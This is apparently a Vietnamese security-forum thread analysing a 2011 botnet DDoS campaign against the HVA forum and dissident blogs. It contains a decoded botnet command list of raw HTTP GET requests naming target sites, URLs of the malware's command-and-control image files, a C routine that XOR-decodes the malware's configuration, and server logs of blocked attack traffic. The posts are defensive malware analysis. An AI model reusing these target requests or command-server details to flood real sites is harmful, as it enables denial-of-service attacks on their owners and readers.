
Phân tích tính chất vài trận DDoS HVA vừa qua.

crc32 — GMT

cino wrote:

.... Đấy là chưa kể các Hệ điều hành 10k/disk bán ngoài chợ, lâu lâu lại phòi ra 1 chú "quản trị cấp hệ thống" hù chơi. Thảm hoạ chẳng kém gì "Da nâu" của dòng nhạc Việt :)

- Em cũng đang sài Hệ Điều Hành 6k đó anh, anh có thể chỉ em làm cách nào để phát hiện chú "quản trị cấp hệ thống" để em góp phần tiêu diệt đám stl?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ngày hôm nay, backgrounds.jpg tại http://net.iadze.com/backgrounds.jpg lại thay đổi, cường độ tấn công vào danlambaovn.blogspot.com tăng mạnh hơn: Code:

1. GET / HTTP/1.1\r\nHost: danlambaovn.blogspot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://danlambaovn.blogspot.com
2. GET / HTTP/1.1\r\nHost: www.dangvannham.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://www.dangvannham.com
3. GET / HTTP/1.1\r\nHost: bienxua.over-blog.fr\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://bienxua.over-blog.fr
4. GET /f/index.php HTTP/1.1\r\nHost: www.hanoihot.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://www.hanoihot.com
/f/index.php
5. GET / HTTP/1.1\r\nHost: www.aihuuphuyen.org\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://www.aihuuphuyen.org
6. GET / HTTP/1.1\r\nHost: nguoiduatinkami.wordpress.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive\r\nReferer: http://nguoiduatinkami.wordpress.com/
 http://nguoiduatinkami.wordpress.com
7. GET / HTTP/1.1\r\nHost: vrvradio.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://vrvradio.com
8. GET /dan_lam_bao_07082011/latest.rss HTTP/1.1\r\nHost: danlambaovn.disqus.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://danlambaovn.disqus.com
/dan_lam_bao_07082011/latest.rss
9. GET /dan_lam_bao_thong_bao_khan_cap_ca_tiep_tuc_bat_bo_nguoi_cong_giao_tai_vinh/latest.rss HTTP/1.1\r\nHost: danlambaovn.disqus.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://danlambaovn.disqus.com
/dan_lam_bao_thong_bao_khan_cap_ca_tiep_tuc_bat_bo_nguoi_cong_giao_tai_vinh/latest.rss
10. GET /dan_lam_bao_toi_phai_noi_toi_phai_gao/latest.rss HTTP/1.1\r\nHost: danlambaovn.disqus.com\r\nUser-Agent: \r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 115\r\nConnection: keep-alive
 http://danlambaovn.disqus.com
/dan_lam_bao_toi_phai_noi_toi_phai_gao/latest.rss

Host second.dinest.net lại được stl đánh thức dậy để hoạt động. xc.jpg tại: http://second.dinest.net/xc.jpg (User-Agent: An0nym0453) đã thay đổi cách mã hoá, nên tool decode lúc trước sẽ không decode hết được. Đang chờ đợi acoustics89 RE và cập nhật tool decode.

Phân tích tính chất vài trận DDoS HVA vừa qua.

micros3ll — GMT

Decode xc.jpg Code:

Ngưng DDoS hva !? Vẫn mã hoá vậy thôi, việc thay đổi mã hoá cần mẫu mới thì mới có thể thực hiện (thay hẳn file, hoặc dùng mẫu khác Inject lại Code khác...). Code vậy anh TQN chế hoài ah... (~,~). Track của mình cũng cập nhật thay đổi của các site này. Nhưng rõ ràng là còn các mẫu khác chưa được phát hiện... Cuộc chiến còn dài, há há. s3ll mong anh Conmale up lên một vài đoạn *.log web và firewall để tham khảo nha. s3ll cũng muốn phân tích thêm các *.log này. Nếu không tiện anh Conmale gửi riêng cho s3ll qua tin nhắn hoặc mail... Thanks !

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

TQN wrote:

Host second.dinest.net lại được stl đánh thức dậy để hoạt động. xc.jpg tại: http://second.dinest.net/xc.jpg (User-Agent: An0nym0453) đã thay đổi cách mã hoá, nên tool decode lúc trước sẽ không decode hết được. Đang chờ đợi acoustics89 RE và cập nhật tool decode.

em tưởng anh TQN bảo code giải mã file TOP, em post rồi đấy, còn cái kia thì vẫn decode bình thường mà, có lỗi gì đâu

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ừ, lạ ha ! Sao giờ decode lại được, lúc chiều wget về thì decode không được ? Cảm ơn acoustics89 nhé ! À anh quên mất, hồi đó em có PM cho anh, anh xoá mất rồi. Mẫu nào download thằng top.jpg từ http://penop.net/top.jpg ? Sẵn tiện acoustics89 xem lại hàm decode top.jpg của em luôn nhé, anh build hay dựa trên nó viết script đều decode không ra.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

TQN wrote:

Ừ, lạ ha ! Sao giờ decode lại được, lúc chiều wget về thì decode không được ? Cảm ơn acoustics89 nhé ! À anh quên mất, hồi đó em có PM cho anh, anh xoá mất rồi. Mẫu nào download thằng top.jpg từ http://penop.net/top.jpg ? Sẵn tiện acoustics89 xem lại hàm decode top.jpg của em luôn nhé, anh build hay dựa trên nó viết script đều decode không ra.

thuật toán decode thì đoạn này là quan trọng nhất, em decode ra 1 xâu unicode nhưng mà làm vội nên cứ để nguyên thế mà ném vào file txt, anh mở ra thì thấy nó có khoảng cách, dùng tạm cũng được. mẫu tải top là googlecrashhandler, từ đâu chắc anh vẫn nhớ :D Code:

fseek(f, 0, SEEK_END);
 		lSize = ftell(f);
 		fseek(f, 0, SEEK_SET);
 
 		pBuffer =(char*) malloc(lSize+1024);
 		if(pBuffer)
 		{
 			
 			p = (char *)pBuffer+ 4;
 			memset(pBuffer, 0, lSize+1024);
 			fread((char*)pBuffer, lSize, 1, f);
 
 			for ( i = 8; i < lSize; ++i )
 			{
 				v24 = p[v7 % 4];
 				v23 = pBuffer[i];
 				v23 = (v24 ^ v23) % 256;
 				pBuffer[i] = v23;
 				v7++;
 				//v8 += v23 * v7++ % 7;
 			}
 		}
 		fclose(f);

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Nhiều anh em muốn "biết mặt" mớ logs DDoS HVA quá nên tớ post lên vài chuỗi cho anh em coi chơi. 1. Dạng referer "/" với hàng loạt User-Agent thay đổi: Code:

113.160.40.198 - - [19/Jul/2011:22:47:19 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15"
113.160.40.198 - - [19/Jul/2011:22:48:54 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
113.160.40.198 - - [19/Jul/2011:22:59:57 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
113.160.40.198 - - [19/Jul/2011:23:01:37 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.160.40.198 - - [19/Jul/2011:23:04:44 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
113.160.40.198 - - [19/Jul/2011:23:06:19 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15"
113.160.40.198 - - [19/Jul/2011:23:07:54 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8"
113.160.40.198 - - [19/Jul/2011:23:09:25 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7"
113.160.40.198 - - [19/Jul/2011:23:12:36 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729)"
113.160.40.198 - - [19/Jul/2011:23:14:11 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
113.160.40.198 - - [19/Jul/2011:23:17:21 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00"
113.160.40.198 - - [19/Jul/2011:23:20:32 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0"
113.160.40.198 - - [19/Jul/2011:23:22:07 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)"

2. Dạng referer "/hvaonline/forums/list.html" cũng với hàng loạt User-Agent thay đổi: Code:

113.160.40.34 - - [19/Jul/2011:04:03:46 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6"
113.160.40.34 - - [19/Jul/2011:04:05:21 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)"
113.160.40.34 - - [19/Jul/2011:04:06:56 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.160.40.34 - - [19/Jul/2011:04:08:31 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.160.40.34 - - [19/Jul/2011:04:10:06 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"
113.160.40.34 - - [19/Jul/2011:04:11:41 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
113.160.40.34 - - [19/Jul/2011:04:13:11 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.160.40.34 - - [19/Jul/2011:04:14:46 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15, "
113.160.40.34 - - [19/Jul/2011:04:16:21 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)"
113.160.40.34 - - [19/Jul/2011:04:18:01 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00"
113.160.40.34 - - [19/Jul/2011:04:19:31 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7"
113.160.40.34 - - [19/Jul/2011:04:21:09 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)"
113.160.40.34 - - [19/Jul/2011:04:22:42 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00"
113.160.40.34 - - [19/Jul/2011:04:24:17 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
113.160.40.34 - - [19/Jul/2011:04:25:52 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
113.160.40.34 - - [19/Jul/2011:04:27:27 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15, "
113.160.40.34 - - [19/Jul/2011:04:29:02 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00"
113.160.40.34 - - [19/Jul/2011:04:30:37 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)"
113.160.40.34 - - [19/Jul/2011:04:32:07 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7"
113.160.40.34 - - [19/Jul/2011:04:33:42 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/hvaonline/forums/list.html" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"

3. Dạng "đánh" trực tiếp với JSSESSIONID kèm theo và không có referer: Code:

113.172.82.238 - - [04/Aug/2011:12:41:30 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:41:33 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:41:40 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:41:42 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.162.86.251 - - [04/Aug/2011:12:41:44 +0200] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7"
113.172.82.238 - - [04/Aug/2011:12:41:47 +0200] "GET /hvaonline/forums/show/28.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:42:05 +0200] "GET /hvaonline/forums/show/31.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
157.55.112.210 - - [04/Aug/2011:12:43:00 +0200] "GET /hvaonline/user/profile/207459.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;  WOW64;  Trident/5.0)"
209.131.36.219 - - [04/Aug/2011:12:43:01 +0200] "GET /hvaonline/posts/list/27555.html;jsessionid=377F92127EBC7057241C547F8A3D5E5B HTTP/1.1" 403 2108 "-" "-"
113.172.82.238 - - [04/Aug/2011:12:43:17 +0200] "GET /hvaonline/posts/list/39694.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"
113.172.82.238 - - [04/Aug/2011:12:43:20 +0200] "GET /hvaonline/posts/list/39694.html;jsessionid=747B94BCC8985E471C236CEFD7567212 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30"

4. Đạng đánh vô trang chủ (/) không cần có referer: Code:

58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10"
58.187.123.50 - - [03/Aug/2011:16:36:38 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:41 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
58.187.123.50 - - [03/Aug/2011:16:36:41 +0900] "GET / HTTP/1.1" 403 2108 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7"

5. Dạng giả mạo "crawler" thứ thiệt: Code:

190.14.250.118 - - [03/Aug/2011:21:08:07 +0200] "GET /hvaonline/forums/show/31.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.111.89.16 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/23.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.189.89.153 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/31.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.189.89.153 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/31.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.189.89.153 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/19.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.111.89.16 - - [03/Aug/2011:21:08:08 +0200] "GET /hvaonline/forums/show/23.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.49.209.206 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.189.89.153 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/show/19.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/show/50.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:09 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:10 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:10 +0200] "GET /hvaonline/forums/show/50.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:10 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.124.178.98 - - [03/Aug/2011:21:08:10 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/show/19.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
